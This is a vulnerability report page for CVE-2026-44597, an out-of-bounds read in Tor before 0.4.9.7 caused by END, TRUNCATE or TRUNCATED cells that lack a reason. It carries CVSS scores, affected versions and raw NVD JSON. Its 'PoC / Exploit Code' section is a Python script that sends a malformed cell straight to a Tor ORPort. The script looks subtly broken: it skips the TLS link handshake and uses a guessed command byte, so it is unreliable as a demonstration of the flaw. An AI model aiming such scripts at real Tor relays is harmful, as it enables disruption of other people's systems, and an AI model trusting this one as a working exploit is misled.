Security Vulnerability Report
中文
CVE-2026-44597 CVSS 3.7 LOW

CVE-2026-44597

Published: 2026-05-07 01:16:01
Last Modified: 2026-05-07 17:34:30

Description

Tor before 0.4.9.7 has an out-of-bounds read when an END, a TRUNCATE, or a TRUNCATED cell lacks a reason in its payload, aka TROVE-2026-011.

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:torproject:tor:*:*:*:*:*:*:*:* - VULNERABLE
Tor < 0.4.9.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # PoC for CVE-2026-44597: Tor Out-of-Bounds Read # This script demonstrates sending a malformed cell to trigger the vulnerability. def send_malformed_cell(target_ip, target_port): """ Sends a crafted cell to the target Tor instance. The cell is of type END/TRUNCATE/TRUNCATED but lacks the 'reason' payload. """ try: # Establish TCP connection to Tor ORPort sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) print(f"[*] Connected to {target_ip}:{target_port}") # Tor Cell Header Structure (Version 3/4): # Circuit ID (4 bytes) + Command (1 byte) # Vulnerable commands include END, TRUNCATE, TRUNCATED. # Assuming a control cell structure for demonstration. circuit_id = 0x12345678 # Arbitrary Circuit ID command = 5 # Example command byte (e.g., RELAY_END or similar control command) # Construct header: CircID (4 bytes, big endian) + Command (1 byte) header = struct.pack("!IB", circuit_id, command) # The vulnerability occurs when the payload is empty/short # but the parser expects a 'reason' byte. payload = b'' # Missing reason field to trigger OOB read full_packet = header + payload sock.send(full_packet) print("[*] Malformed cell sent.") sock.close() except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Replace with actual target details for testing TARGET_IP = "127.0.0.1" TARGET_PORT = 9001 send_malformed_cell(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44597", "sourceIdentifier": "[email protected]", "published": "2026-05-07T01:16:01.163", "lastModified": "2026-05-07T17:34:30.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tor before 0.4.9.7 has an out-of-bounds read when an END, a TRUNCATE, or a TRUNCATED cell lacks a reason in its payload, aka TROVE-2026-011."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-684"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torproject:tor:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.4.9.7", "matchCriteriaId": "E643A817-85FE-4CEC-BC69-0E2FA22639C0"}]}]}], "references": [{"url": "https://forum.torproject.org/c/news/tor-release-announcement/28", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://gitlab.torproject.org/tpo/core/tor/-/commit/8f98054b1982d00a14639864d03e9afd90b87481", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://gitlab.torproject.org/tpo/core/tor/-/work_items/41254", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/06/8", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}]}}